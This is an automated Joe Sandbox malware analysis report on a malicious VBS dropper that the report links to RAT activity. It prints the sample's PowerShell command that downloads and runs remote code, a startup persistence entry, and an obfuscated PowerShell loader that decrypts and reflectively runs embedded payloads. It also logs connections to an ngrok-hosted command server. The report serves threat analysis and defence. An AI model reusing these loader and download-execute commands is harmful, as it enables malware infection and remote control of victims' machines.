                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1573765
                                    Start date and time:2024-12-12 15:39:18 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 6m 8s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:31
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:7299_output.vbs
                                    Detection:MAL
                                    Classification:mal100.troj.expl.evad.winVBS@46/24@2/2
                                    EGA Information:
                                    • Successful, ratio: 50%
                                    HCA Information:
                                    • Successful, ratio: 53%
                                    • Number of executed functions: 9
                                    • Number of non-executed functions: 2
                                    Cookbook Comments:
                                    • Found application associated with file extension: .vbs
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                    • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.63
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target powershell.exe, PID 7636 because it is empty
                                    • Not all processes were analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtCreateKey calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • VT rate limit hit for: 7299_output.vbs
                                    Time | Type | Description
                                    09:40:15 | API Interceptor | 199x Sleep call for process: powershell.exe modified
                                    14:41:27 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd
                                    Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                    3.78.28.71 | TLH3anP3lh.exe | malicious | Njrat |
                                     | r0FS3r7Ore.exe | malicious | Njrat |
                                     | lXLWfHWHMd.exe | malicious | Njrat |
                                     | 4zeGOaTirn.exe | malicious | Njrat |
                                            Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                            0.tcp.eu.ngrok.io | Opera.exe | malicious | ZTrat | 52.57.120.10
                                             | YiWuyX184J.exe | malicious | Njrat | 3.74.27.83
                                             | TLH3anP3lh.exe | malicious | Njrat | 52.57.120.10
                                             | r0FS3r7Ore.exe | malicious | Njrat | 3.74.27.83
                                             | OLHskBFtS1.exe | malicious | Njrat | 3.74.27.83
                                             | lXLWfHWHMd.exe | malicious | Njrat | 18.192.31.30
                                             | tjK8Z8Q3JH.exe | malicious | Njrat | 18.153.198.123
                                             | 4zeGOaTirn.exe | malicious | Njrat | 3.78.28.71
                                             | C9zGTJBy3T.exe | malicious | Njrat | 3.125.209.94
                                             | 7UpMyeV5pj.exe | malicious | Njrat | 3.124.142.205
                                            Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                            AMAZON-02US | 7166_output.vbs | malicious | AsyncRAT | 18.197.239.5
                                             | phish_alert_sp2_2.0.0.0 (1).eml | malicious | Unknown | 52.219.193.160
                                             | 2.elf | malicious | Unknown | 54.126.45.88
                                             | http://annavirgili.com | malicious | CAPTCHA Scam ClickFix | 52.49.166.168
                                             | http://annavirgili.com | malicious | CAPTCHA Scam ClickFix | 52.49.166.168
                                             | jew.m68k.elf | malicious | Unknown | 99.84.2.249
                                             | http://annavirgili.com | malicious | CAPTCHA Scam ClickFix | 34.240.184.84
                                             | http://productfocus.com | malicious | Unknown | 108.158.75.80
                                             | Non_disclosure_agreement.lnk.download.lnk | malicious | Unknown | 13.226.94.121
                                             | https://feji.us/m266he | malicious | Unknown | 18.194.154.81
                                            No context
                                            No context
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):9713
                                            Entropy (8bit):4.940954773740904
                                            Encrypted:false
                                            SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smu9:9rib4ZIkjh4iUxsNYW6Ypib47
                                            MD5:BA7C69EBE30EC7DA697D2772E36A746D
                                            SHA1:DA93AC7ADC6DE8CFFED4178E1F98F0D0590EA359
                                            SHA-256:CFCE399DF5BE3266219AA12FB6890C6EEFDA46D6279A0DD90E82A970149C5639
                                            SHA-512:E0AFE4DF389A060EFDACF5E78BA6419CECDFC674AA5F201C458D517C20CB50B70CD8A4EB23B18C0645BDC7E9F326CCC668E8BADE803DED41FCDA2AE1650B31E8
                                            Malicious:false
                                            Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):2900
                                            Entropy (8bit):5.4484081111471205
                                            Encrypted:false
                                            SSDEEP:48:4jAzsSU4MmT5ajms4RIoUxqr9t5/78NKPARCxJZKaVEouYAgwd64rHLjtv2:QAzlHJTFsIfeqrh7KKdJ5Eo9Adrx2
                                            MD5:8F8532B0C5CBF392E105962F96B4B414
                                            SHA1:9071A1591DE17635670607E1FABA3F22B3E26F05
                                            SHA-256:E73BC4C85E54ADAAC649C8FF1FE013821BD070998363AF83C1FC93077D4F7994
                                            SHA-512:0A0B3A8685E50C217CBDEDA579A284F4549C59EE23EF0A04CED24914B0B4DCF7DAB43ADE6A2EF58FD2C1C6575F5A5579883428EFE94F8DD848EBBA0AB593C7AE
                                            Malicious:false
                                            Preview:@...e................................................@..........H..............@-....f.J.|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation4.................%...K... ...........System.Xml..<...............i..VdqF...|...........System.Configuration4.................0..~.J.R...L........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):64
                                            Entropy (8bit):1.1940658735648508
                                            Encrypted:false
                                            SSDEEP:3:Nlllul/nq/llh:NllUyt
                                            MD5:AB80AD9A08E5B16132325DF5584B2CBE
                                            SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
                                            SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
                                            SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
                                            Malicious:false
                                            Preview:@...e................................................@..........
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            (13 further dropped files with identical metadata to the entry above: Process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ASCII text with no line terminators, 60 bytes, MD5 D17FE0A3F47BE24A6453E9EF58C94641, SHA-256 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7, Malicious: false, same "# PowerShell test file to determine AppLocker lockdown mode" preview)
                                            Process:C:\Windows\System32\wscript.exe
                                            File Type:DOS batch file, ASCII text, with very long lines (26562), with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):37584
                                            Entropy (8bit):6.03138029023125
                                            Encrypted:false
                                            SSDEEP:768:nqxZlsXeKPl8GMCnKozq7gzBmfw56m4b8jMyyzCdK:qPl+lSGrvzq7gzBHU78jYWdK
                                            MD5:C3CC3D10C8C54A96BE4862355D25E0AB
                                            SHA1:72B55F50E768FCAEECCAF3E4217AFDD177A83E4D
                                            SHA-256:C00552E52FD3548F9EC3FFE4F4A1A8628473B2281A71BC95A733DA10AE4E5A34
                                            SHA-512:6ACCC51D9A9FFA4A735BE54A838DC9AA85FFEA2238CD6C500BCCD44A408D3BAE8588EA7AAF80AA1827E10DED7D2DC561B935F63BA9C59276C2DABFDBCC58C3EB
                                            Malicious:true
                                            Preview:@echo off..setlocal enabledelayedexpansion..set "Rp=seift ifpTif=if1if &&if ifstaifrtif if""if /ifmiifnif if"..set "Um=&& ifeifxifitif"..set "Wl=nifotif ifdeiffiifnifedif pTif..if %Wl:if=% (%Rp:if=%%0 %Um:if=%)..::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
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:DOS batch file, ASCII text, with very long lines (26562), with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):37584
                                            Entropy (8bit):6.03138029023125
                                            Encrypted:false
                                            SSDEEP:768:nqxZlsXeKPl8GMCnKozq7gzBmfw56m4b8jMyyzCdK:qPl+lSGrvzq7gzBHU78jYWdK
                                            MD5:C3CC3D10C8C54A96BE4862355D25E0AB
                                            SHA1:72B55F50E768FCAEECCAF3E4217AFDD177A83E4D
                                            SHA-256:C00552E52FD3548F9EC3FFE4F4A1A8628473B2281A71BC95A733DA10AE4E5A34
                                            SHA-512:6ACCC51D9A9FFA4A735BE54A838DC9AA85FFEA2238CD6C500BCCD44A408D3BAE8588EA7AAF80AA1827E10DED7D2DC561B935F63BA9C59276C2DABFDBCC58C3EB
                                            Malicious:true
                                            Preview:@echo off..setlocal enabledelayedexpansion..set "Rp=seift ifpTif=if1if &&if ifstaifrtif if""if /ifmiifnif if"..set "Um=&& ifeifxifitif"..set "Wl=nifotif ifdeiffiifnifedif pTif..if %Wl:if=% (%Rp:if=%%0 %Um:if=%)..::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
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with very long lines (2187), with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):2189
                                            Entropy (8bit):5.785410013200099
                                            Encrypted:false
                                            SSDEEP:48:+ucRPgZNSxDJEcnuZxcbpzlRSRkRxgBL0BQgjbSkHkuBJNZk0UNJqU4tDWX:HVNrc+xOzl0C7gBL0BQMnfk02qtW
                                            MD5:9A9F50A15721A489CC463EA56BB61640
                                            SHA1:E232205F1F9EDEBE631279B49A1B291DEFF6B4CA
                                            SHA-256:B457E236287DB73892BE32145C8D2252C86C818EA3104E4CADCDFF188F02A0CA
                                            SHA-512:CCC6A0EB01D838670E145A80B9B247ABB2E92AC0DEEDB19782B42291C470568ABB1684ECE4CFC3016C1DDD80F6EE6D37EBEB510FD32FF0FB3CC098E5B1B84B77
                                            Malicious:false
                                            Preview:$host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd';$NHES='ErLgzntrLgzryrLgzPorLgzinrLgztrLgz'.Replace('rLgz', ''),'CHprLhHprLanHprLgeEHprLxtHprLensHprLionHprL'.Replace('HprL', ''),'CrvvlOevvlOavvlOtevvlODevvlOcrvvlOyvvlOptvvlOorvvlO'.Replace('vvlO', ''),'RemtKNamtKNdLmtKNinmtKNesmtKN'.Replace('mtKN', ''),'SptlAblittlAb'.Replace('tlAb', ''),'MaiShffnShffMoShffdShffulShffeShff'.Replace('Shff', ''),'GetKIgbCKIgburKIgbrKIgbenKIgbtPrKIgboKIgbceKIgbssKIgb'.Replace('KIgb', ''),'DecCIZVomCIZVprCIZVessCIZV'.Replace('CIZV', ''),'FrotqyzmBtqyzasetqyz6tqyz4Stqyztrtqyzitqyzngtqyz'.Replace('tqyz', ''),'ThZggrhZgganshZggfohZggrhZggmFhZgginahZgglBlhZggochZggkhZgg'.Replace('hZgg', ''),'InUneOvoUneOkeUneO'.Replace('UneO', ''),'ElLHtjemeLHtjntLHtjALHtjtLHtj'.Replace('LHtj', ''),'LoaKqbadKqba'.Replace('Kqba', ''),'CoqGYmpyqGYmToqGYm'.Replace('qGYm', '');powershell -w hidden;function fyfwL($itxzH){$CuCRJ=[System.Security.Cryptograph
                                            Process:C:\Windows\System32\timeout.exe
                                            File Type:ASCII text, with CRLF line terminators, with overstriking
                                            Category:dropped
                                            Size (bytes):53
                                            Entropy (8bit):4.538872341192371
                                            Encrypted:false
                                            SSDEEP:3:hYFnjQGARcWmFsFJQZov:hYFWmFSQZov
                                            MD5:5BFD4A973BE54A8EBC2A7F79CFCF4B6C
                                            SHA1:071E9887A3B0E5500EC2116564E4DF0962946CB6
                                            SHA-256:BBDCFB24BDD6DE329D8616497FE5F0C7F4644A484B825632339127F6E2CCA843
                                            SHA-512:F4CD10A9977B515B39946870981E9DE599040B442AE890073B6FD04DD3086CACD6F32F19888575ECB7CC5A3A0C4408513983E6CAFCBCF5B50E140F4BDCF507D9
                                            Malicious:false
                                            Preview:..Waiting for 1 seconds, press CTRL+C to quit ....0..
                                            File type:ASCII text, with very long lines (26580), with CRLF line terminators
                                            Entropy (8bit):6.0501793722723525
                                            TrID:
                                              File name:7299_output.vbs
                                              File size:38'426 bytes
                                              MD5:023ae408481fd04c22f2a161266b7182
                                              SHA1:718f14dbeb0ff6b89a5189efe5e9cf940ba55d00
                                              SHA256:422fcf5c6b60ba6118a539ab69901d4821ab1bc044543deb5f73673b2b8f4e65
                                              SHA512:58b605a42b4c8af880cc961d92db0487f14d0328af10b2bf35c62e59912a74bca183fed8ab5ecacaf7be3967ac06a60224b961ba19c8181e6f102210d09c5b47
                                              SSDEEP:768:XqxZlsXeKPl8GMCnKozq7gzBmfw56mEb8jMyyLCdE:6Pl+lSGrvzq7gzBHU78jYOdE
                                              TLSH:3903D0206B15FDD9BD8010BB6A3692AB517139FF4168D3387FB03D566D0E66D04D28EC
                                              File Content Preview:Set b = CreateObject("WScript.Shell")..b.Run "cmd /c powershell -NoProfile -ExecutionPolicy Bypass -Command ""iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })""", 0, False..WScript.
                                              Icon Hash:68d69b8f86ab9a86
                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                              Dec 12, 2024 15:41:59.734360933 CET | 49846 | 13094 | 192.168.2.4 | 3.78.28.71
                                              Dec 12, 2024 15:41:59.854135036 CET | 13094 | 49846 | 3.78.28.71 | 192.168.2.4
                                              Dec 12, 2024 15:41:59.854266882 CET | 49846 | 13094 | 192.168.2.4 | 3.78.28.71
                                              Dec 12, 2024 15:42:00.518215895 CET | 49846 | 13094 | 192.168.2.4 | 3.78.28.71
                                              Dec 12, 2024 15:42:00.638128042 CET | 13094 | 49846 | 3.78.28.71 | 192.168.2.4
                                              Dec 12, 2024 15:42:02.026566029 CET | 13094 | 49846 | 3.78.28.71 | 192.168.2.4
                                              Dec 12, 2024 15:42:02.026679993 CET | 49846 | 13094 | 192.168.2.4 | 3.78.28.71
                                              Dec 12, 2024 15:42:04.562973022 CET | 49846 | 13094 | 192.168.2.4 | 3.78.28.71
                                              Dec 12, 2024 15:42:04.682821035 CET | 13094 | 49846 | 3.78.28.71 | 192.168.2.4
                                              Dec 12, 2024 15:42:06.774338007 CET | 49864 | 13094 | 192.168.2.4 | 3.78.28.71
                                              Dec 12, 2024 15:42:06.894304991 CET | 13094 | 49864 | 3.78.28.71 | 192.168.2.4
                                              Dec 12, 2024 15:42:06.894414902 CET | 49864 | 13094 | 192.168.2.4 | 3.78.28.71
                                              Dec 12, 2024 15:42:06.932420015 CET | 49864 | 13094 | 192.168.2.4 | 3.78.28.71
                                              Dec 12, 2024 15:42:07.052248955 CET | 13094 | 49864 | 3.78.28.71 | 192.168.2.4
                                              Dec 12, 2024 15:42:09.057163000 CET | 13094 | 49864 | 3.78.28.71 | 192.168.2.4
                                              Dec 12, 2024 15:42:09.057252884 CET | 49864 | 13094 | 192.168.2.4 | 3.78.28.71
                                              Dec 12, 2024 15:42:10.719341040 CET | 49864 | 13094 | 192.168.2.4 | 3.78.28.71
                                              Dec 12, 2024 15:42:10.839324951 CET | 13094 | 49864 | 3.78.28.71 | 192.168.2.4
                                              Dec 12, 2024 15:42:12.866105080 CET | 49880 | 13094 | 192.168.2.4 | 3.78.28.71
                                              Dec 12, 2024 15:42:12.987457037 CET | 13094 | 49880 | 3.78.28.71 | 192.168.2.4
                                              Dec 12, 2024 15:42:12.987593889 CET | 49880 | 13094 | 192.168.2.4 | 3.78.28.71
                                              Dec 12, 2024 15:42:13.037599087 CET | 49880 | 13094 | 192.168.2.4 | 3.78.28.71
                                              Dec 12, 2024 15:42:13.157457113 CET | 13094 | 49880 | 3.78.28.71 | 192.168.2.4
                                              Dec 12, 2024 15:42:15.151748896 CET | 13094 | 49880 | 3.78.28.71 | 192.168.2.4
                                              Dec 12, 2024 15:42:15.151882887 CET | 49880 | 13094 | 192.168.2.4 | 3.78.28.71
                                              Dec 12, 2024 15:42:16.050985098 CET | 49880 | 13094 | 192.168.2.4 | 3.78.28.71
                                              Dec 12, 2024 15:42:16.061170101 CET | 49886 | 13094 | 192.168.2.4 | 3.78.28.71
                                              Dec 12, 2024 15:42:16.171034098 CET | 13094 | 49880 | 3.78.28.71 | 192.168.2.4
                                              Dec 12, 2024 15:42:16.181240082 CET | 13094 | 49886 | 3.78.28.71 | 192.168.2.4
                                              Dec 12, 2024 15:42:16.181332111 CET | 49886 | 13094 | 192.168.2.4 | 3.78.28.71
                                              Dec 12, 2024 15:42:16.199498892 CET | 49886 | 13094 | 192.168.2.4 | 3.78.28.71
                                              Dec 12, 2024 15:42:16.319302082 CET | 13094 | 49886 | 3.78.28.71 | 192.168.2.4
                                              Dec 12, 2024 15:42:18.355223894 CET | 13094 | 49886 | 3.78.28.71 | 192.168.2.4
                                              Dec 12, 2024 15:42:18.355326891 CET | 49886 | 13094 | 192.168.2.4 | 3.78.28.71
                                              Dec 12, 2024 15:42:19.391175985 CET | 49886 | 13094 | 192.168.2.4 | 3.78.28.71
                                              Dec 12, 2024 15:42:19.399250984 CET | 49895 | 13094 | 192.168.2.4 | 3.78.28.71
                                              Dec 12, 2024 15:42:19.510991096 CET | 13094 | 49886 | 3.78.28.71 | 192.168.2.4
                                              Dec 12, 2024 15:42:19.518990040 CET | 13094 | 49895 | 3.78.28.71 | 192.168.2.4
                                              Dec 12, 2024 15:42:19.519087076 CET | 49895 | 13094 | 192.168.2.4 | 3.78.28.71
                                              Dec 12, 2024 15:42:19.538635969 CET | 49895 | 13094 | 192.168.2.4 | 3.78.28.71
                                              Dec 12, 2024 15:42:19.658595085 CET | 13094 | 49895 | 3.78.28.71 | 192.168.2.4
                                              Dec 12, 2024 15:42:21.683116913 CET | 13094 | 49895 | 3.78.28.71 | 192.168.2.4
                                              Dec 12, 2024 15:42:21.683208942 CET | 49895 | 13094 | 192.168.2.4 | 3.78.28.71
                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                              Dec 12, 2024 15:40:16.914623022 CET | 58660 | 53 | 192.168.2.4 | 1.1.1.1
                                              Dec 12, 2024 15:40:17.054253101 CET | 53 | 58660 | 1.1.1.1 | 192.168.2.4
                                              Dec 12, 2024 15:41:59.499521017 CET | 52413 | 53 | 192.168.2.4 | 1.1.1.1
                                              Dec 12, 2024 15:41:59.717545033 CET | 53 | 52413 | 1.1.1.1 | 192.168.2.4
                                              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                              Dec 12, 2024 15:40:16.914623022 CET | 192.168.2.4 | 1.1.1.1 | 0x1a9c | Standard query (0) | emptyservices.xyz | A (IP address) | IN (0x0001) | false
                                              Dec 12, 2024 15:41:59.499521017 CET | 192.168.2.4 | 1.1.1.1 | 0x67b5 | Standard query (0) | 0.tcp.eu.ngrok.io | A (IP address) | IN (0x0001) | false
                                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                              Dec 12, 2024 15:40:17.054253101 CET | 1.1.1.1 | 192.168.2.4 | 0x1a9c | Name error (3) | emptyservices.xyz | none | none | A (IP address) | IN (0x0001) | false
                                              Dec 12, 2024 15:41:59.717545033 CET | 1.1.1.1 | 192.168.2.4 | 0x67b5 | No error (0) | 0.tcp.eu.ngrok.io | | 3.78.28.71 | A (IP address) | IN (0x0001) | false

                                              Target ID:0
                                              Start time:09:40:13
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\wscript.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\7299_output.vbs"
                                              Imagebase:0x7ff6999b0000
                                              File size:170'496 bytes
                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:1
                                              Start time:09:40:13
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
                                              Imagebase:0x7ff6081d0000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:2
                                              Start time:09:40:13
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:3
                                              Start time:09:40:13
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
                                              Imagebase:0x7ff788560000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:7
                                              Start time:09:41:13
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c.bat" "
                                              Imagebase:0x7ff6081d0000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:8
                                              Start time:09:41:13
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:9
                                              Start time:09:41:14
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\c.bat"
                                              Imagebase:0x7ff6081d0000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              Target ID:10
                                              Start time:09:41:14
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              Target ID:11
                                              Start time:09:41:14
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Local\Temp\c.bat';$NHES='ErLgzntrLgzryrLgzPorLgzinrLgztrLgz'.Replace('rLgz', ''),'CHprLhHprLanHprLgeEHprLxtHprLensHprLionHprL'.Replace('HprL', ''),'CrvvlOevvlOavvlOtevvlODevvlOcrvvlOyvvlOptvvlOorvvlO'.Replace('vvlO', ''),'RemtKNamtKNdLmtKNinmtKNesmtKN'.Replace('mtKN', ''),'SptlAblittlAb'.Replace('tlAb', ''),'MaiShffnShffMoShffdShffulShffeShff'.Replace('Shff', ''),'GetKIgbCKIgburKIgbrKIgbenKIgbtPrKIgboKIgbceKIgbssKIgb'.Replace('KIgb', ''),'DecCIZVomCIZVprCIZVessCIZV'.Replace('CIZV', ''),'FrotqyzmBtqyzasetqyz6tqyz4Stqyztrtqyzitqyzngtqyz'.Replace('tqyz', ''),'ThZggrhZgganshZggfohZggrhZggmFhZgginahZgglBlhZggochZggkhZgg'.Replace('hZgg', ''),'InUneOvoUneOkeUneO'.Replace('UneO', ''),'ElLHtjemeLHtjntLHtjALHtjtLHtj'.Replace('LHtj', ''),'LoaKqbadKqba'.Replace('Kqba', ''),'CoqGYmpyqGYmToqGYm'.Replace('qGYm', '');powershell -w hidden;function fyfwL($itxzH){$CuCRJ=[System.Security.Cryptography.Aes]::Create();$CuCRJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CuCRJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CuCRJ.Key=[System.Convert]::($NHES[8])('gdCIwM8MuMxo7da/mrtCyIbOUmXu2FksViNDT/cHSz8=');$CuCRJ.IV=[System.Convert]::($NHES[8])('gcSSwI2zcUs6f9nNUiiZ/Q==');$kPfFB=$CuCRJ.($NHES[2])();$bvXzm=$kPfFB.($NHES[9])($itxzH,0,$itxzH.Length);$kPfFB.Dispose();$CuCRJ.Dispose();$bvXzm;}function RmDOY($itxzH){$dolaJ=New-Object System.IO.MemoryStream(,$itxzH);$wpdCQ=New-Object System.IO.MemoryStream;$MfuWs=New-Object System.IO.Compression.GZipStream($dolaJ,[IO.Compression.CompressionMode]::($NHES[7]));$MfuWs.($NHES[13])($wpdCQ);$MfuWs.Dispose();$dolaJ.Dispose();$wpdCQ.Dispose();$wpdCQ.ToArray();}$iiIRz=[System.IO.File]::($NHES[3])([Console]::Title);$bZoFj=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 5).Substring(2))));$NLfYF=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 6).Substring(2))));[System.Reflection.Assembly]::($NHES[12])([byte[]]$NLfYF).($NHES[0]).($NHES[10])($null,$null);[System.Reflection.Assembly]::($NHES[12])([byte[]]$bZoFj).($NHES[0]).($NHES[10])($null,$null); "
                                              Imagebase:0x7ff6081d0000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:false
                                              Has administrator privileges:false
